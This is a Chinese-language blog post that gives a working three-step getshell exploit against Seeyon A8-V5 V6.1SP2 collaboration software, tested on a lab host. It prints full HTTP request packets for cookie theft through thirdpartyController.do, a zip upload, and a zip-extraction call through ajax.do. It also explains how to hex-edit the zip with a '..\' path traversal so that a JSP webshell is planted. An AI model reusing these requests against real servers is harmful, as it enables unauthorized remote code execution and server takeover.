測試版本為: 致遠 A8-V5 協同管理軟件 V6.1SP2
自行搭建環境:

Getshell 分三步
1.獲取cookie信息
2.上傳壓縮文件
3.解壓壓縮文件得到shell
獲取 cookie 信息
漏洞文件
/seeyon/thirdpartyController.do
數據包:
1 2 3 4 5 6 7 8 9 10 11 12 13
|
POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.1.88:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 133
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
|
獲取到 cookie

上傳壓縮文件
漏洞點:
/seeyon/fileUpload.do?method=processUpload&maxSize=
數據包:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
|
POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1 Host: 192.168.1.88:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.88:8080/seeyon/fileUpload.do?method=processUpload&maxSize= Cookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------1416682316313 Content-Length: 1179
-----------------------------1416682316313 Content-Disposition: form-data; name="type"
-----------------------------1416682316313 Content-Disposition: form-data; name="extensions"
-----------------------------1416682316313 Content-Disposition: form-data; name="applicationCategory"
-----------------------------1416682316313 Content-Disposition: form-data; name="destDirectory"
-----------------------------1416682316313 Content-Disposition: form-data; name="destFilename"
-----------------------------1416682316313 Content-Disposition: form-data; name="maxSize"
-----------------------------1416682316313 Content-Disposition: form-data; name="isEncrypt"
-----------------------------1416682316313 Content-Disposition: form-data; name="file1"; filename="123.zip" Content-Type: application/x-zip-compressed
zip文件 -----------------------------1416682316313--
|
直接替換上傳數據包 cookie 與地址信息發送會返回一個 fileurls 值

3. 解壓文件得到 shell
漏洞文件
/seeyon/ajax.do
數據包:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
|
POST /seeyon/ajax.do HTTP/1.1 Host: 192.168.1.88:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 142
method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2021-04-10","2708692024033719158"]
|

驗證結果
訪問壓縮包里的文件進行驗證 解壓后文件位置位於
/seeyon/common/designer/pageLayout/壓縮包里文件名
成功 getshell

注:制作 zip 文件
新建兩個文件
layout.xml 必須存在否則在利用解壓漏洞時會解壓失敗空內容即可
12345678.txt 可是任意名稱與內容 想上傳webshell替換成webshell內容與jsp后綴即可
壓縮成 zip 文件

使用文本編輯 zip 包把 shell 文件名前三位替換成..\ 修改前和修改后位數不能變否則 zip 文件損壞

保存查看效果

反正能用:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
|
|
版權聲明: 本博客所有文章除特別聲明外,均采用 CC BY-NC-SA 4.0 許可協議。轉載請注明來自 Liqun!